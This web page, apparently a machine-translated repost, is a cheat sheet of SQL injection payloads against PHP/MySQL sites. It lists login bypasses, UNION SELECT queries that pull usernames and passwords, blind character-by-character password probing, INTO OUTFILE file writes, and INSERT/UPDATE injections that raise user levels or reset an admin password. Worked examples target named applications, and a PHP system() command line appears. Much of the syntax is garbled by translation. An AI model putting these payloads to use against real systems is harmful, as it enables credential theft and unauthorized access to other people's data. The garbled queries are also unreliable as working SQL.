Php Injection library Summary

Source: Internet
Author: User

Or 1 = 1
Or 1 = 1
/*
% 23
And password = mypass
Id =-1 union select 1, 1
Id =-1 union select char (97), char (97), char (97)
Id = 1 union select 1, 1 from members
Id = 1 union select 1, 1 from admin
Id = 1 union select 1, 1 from user
Userid = 1 and password = mypass
Userid = 1 and mid (password, 112) = char)
Userid = 1 and mid (password, 4, 1) = char (97)
And ord (mid (password, 111)> (the ord function is very useful and can return an integer)
And LENGTH (password) = 6 (LENGTH of the probe password)
And LEFT (password, 1) = m
And LEFT (password, 2) = my
...................... And so on
Union select 1, username, password from user /*
Union select 1, username, password from user /*
= Union select 1, username, password from user/* (can be 1 or = followed directly)
99999 union select 1, username, password from user /*
Into outfile c:/file.txt (export file)
= Or 1 = 1 into outfile c:/file.txt
1 union select 1, username, password from user into outfile c:/user.txt
SELECT password FROM admins WHERE login = John into dumpfile/path/to/site/file.txt
Id = union select 1, username, password from user into outfile
Id =-1 union select 1, database (), version () (flexible application query)
Commonly used query test statement,
SELECT * FROM table WHERE 1 = 1
SELECT * FROM table WHERE uuu = uuu
SELECT * FROM table WHERE 1 <> 2
SELECT * FROM table WHERE 3> 2
SELECT * FROM table WHERE 2 <3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1 + 1
SELECT * FROM table WHERE 1--1
SELECT * FROM table where isnull (NULL)
SELECT * FROM table where isnull (COT (0 ))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE B BETWEEN a AND c
SELECT * FROM table WHERE 2 IN (0, 1, 2)
SELECT * FROM table where case when 1> 0 THEN 1 END

For example, the night cat Download System Version 1.0
Id = 1 union select, 1
Union select, 1 from ymdown_user
Union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1
Id = 10000 union select, 1 from ymdown_user where id = 1 and groupid = 1
Union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace, look for a password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49 (verify the First password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 50 (second digit)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password,) = 51
........................................ ..........................

Example 2: gray track transformation id test (meteor)
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, user (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2013) % 20 order % 20by % 20 eventdate
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, pass (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2010) % 20 order % 20by % 20 eventdate
Construction statement:
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, 1 from user where userid = 1)
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, username, password from user where userid = 1)
UNION % 20 (SELECT % ,,0, 205-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid % 20 = %) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid = 13465) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, userid % 20 FROM % 20 user % 20 WHERE % 20 username = sandflee) % 20 order % 20by % 20 eventdate (check the sand id)

 

(SELECT a FROM table_name WHERE a = 10 and B = 1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid = $ id union select * FROM... (when fields are the same as databases, you can directly submit them)
SELECT * FROM article WHERE articleid = $ id union select, 1 FROM ...... (in different cases)

Special tips: Write in forms, search engines, and other places:
"___"
".__"
"%
% Order by articleid /*
% Order by articleid #
_ Order by articleid /*
_ Order by articleid #

$ Command = "dir c:"; system ($ command );
SELECT * FROM article WHERE articleid = $ id
SELECT * FROM article WHERE articleid = $ id
1 and 1 = 2 union select * from user where userid = 1 /*
(SELECT * FROM article WHERE articleid = 1 and 1 = 2 union select * from user where userid = 1 /*)
1 and 1 = 2 union select * from user where userid = 1

Statement format: Create a database, insert:
Create database 'inobjection'
Create table 'user '(
'Userid' int (11) not null auto_increment,
'Username' varchar (20) not null default,
'Password' varchar (20) not null default,
Primary key ('userid ')
);
Insert into 'user' VALUES (1, swap, mypass );


Insert as a registered user:
Insert into 'user' (userid, username, password, homepage, userlevel) VALUES (, $ username, $ password, $ homepage, 1 );
"Insert into membres (login, password, nom, email, userlevel) VALUES ($ login, $ pass, $ nom, $ email, 1 )";
Insert into membres (login, password, nom, email, userlevel) VALUES (, 3) #, 1)
"Insert into membres SET login = $ login, password = $ pass, nom = $ nom, email = $ email ";
Insert into membres SET login =, password =, nom =, userlevel = 3, email =
"Insert into membres VALUES ($ id, $ login, $ pass, $ nom, $ email, 1 )";

UPDATE user SET password = $ password, homepage = $ homepage WHERE id = $ id
UPDATE user SET password = MD5 (mypass) WHERE username = admin #), homepage = $ homepage WHERE id = $ id
"UPDATE membres SET password = $ pass, nom = $ nom, email = $ email WHERE id = $ id ";
UPDATE membres SET password = [PASS], nom =, userlevel = 3, email = WHERE id = [ID]
"UPDATE news SET Votes = Votes + 1, score = score + $ note WHERE idnews = $ id ";

Extended functions:
DATABASE ()
USER ()
SYSTEM_USER ()
SESSION_USER ()
CURRENT_USER ()
For example:
UPDATE article SET title = $ title WHERE articleid = 1 corresponding function
UPDATE article SET title = DATABASE () WHERE id = 1
# Update the current database name to the title Field
UPDATE article SET title = USER () WHERE id = 1
# Update the current MySQL user name to the title Field
UPDATE article SET title = SYSTEM_USER () WHERE id = 1
# Update the current MySQL user name to the title Field
UPDATE article SET title = SESSION_USER () WHERE id = 1
# Update the current MySQL user name to the title Field
UPDATE article SET title = CURRENT_USER () WHERE id = 1
# Update the authenticated username of the current session to the title field.

:::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::
$ Req = "SELECT * FROM membres WHERE name LIKE % $ search % order by name ";
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name
SELECT uid FROM admins WHERE login = OR a = a AND password = OR a = a (Classic)
SELECT uid FROM admins WHERE login = OR admin_level = 1 # AND password =
SELECT * FROM table WHERE msg LIKE % hop
SELECT uid FROM membres WHERE login = Bob AND password LIKE a % # AND password =
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.